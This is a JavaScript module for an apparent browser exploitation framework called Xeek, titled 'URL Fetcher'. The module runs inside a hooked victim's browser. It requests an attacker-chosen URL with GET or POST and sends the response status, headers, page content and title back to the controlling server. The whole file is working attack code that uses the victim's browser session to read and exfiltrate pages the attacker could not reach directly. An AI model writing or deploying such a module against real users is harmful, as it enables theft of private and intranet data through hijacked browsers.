/*
 * Name: URL Fetcher
 * Description: Fetch a url on the server and return its content.
 * Author: Emilien Girault
 * Version: 1.0
 *
 * Parameters: 
 *  - method: HTTP method (GET or POST)
 *      Default value: GET
 *  - url: The url we want to fetch, including GET parameters
 *  - params: POST parameters
 *      Optional: YES
 *      Default value: 
 */
CREATE_XEEK_EXPLOIT({
  run: function(token, params) {
  
    //Fetch the url using the appropriate method
    method = (params["method"] == "GET") ? XeekAgent.Ajax.Classic.get : XeekAgent.Ajax.Classic.post;
    method.call(XeekAgent.Ajax.Classic, params["url"], params["params"], function(cross_domain_error){
      
      //If we tried to perform a cross domain request, send an error to the server
      if(cross_domain_error){
      
        XeekAgent.saveResult(token, { "error": true });
      
      } else { //Otherwise parse the response
      
        var title = "";
        var headers = "";

        //Get the title, if any
        var res = /<title>(.+)<\/title>/.exec(this.responseText);
        if(res != null){
          title = res[1];
        }
        
        //Get and parse headers
        var raw_headers = this.getAllResponseHeaders().split('\n');
        var h;
        for(var i = 0; i < raw_headers.length; i++){
          h = raw_headers[i]
          if(h.substring(1) !== '') {
            h = h.replace(/\s+$/,"") + "\r\n";
            headers += h;
          }
        }
        
        //Send the result back to the server
        XeekAgent.saveResult(token, { "status": this.status,
                                      "headers": headers,
                                      "content": this.responseText,
                                      "title": title});
      
      }
    });
    
  }
});
